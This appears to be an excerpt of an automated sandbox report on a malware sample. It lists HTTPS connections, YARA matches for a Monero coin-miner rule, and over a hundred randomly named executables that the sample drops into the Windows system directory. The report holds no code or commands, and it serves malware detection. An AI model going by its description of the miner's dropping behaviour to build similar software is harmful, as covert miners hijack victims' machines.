Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49821 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth

Creates files inside the system directory

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to behavior
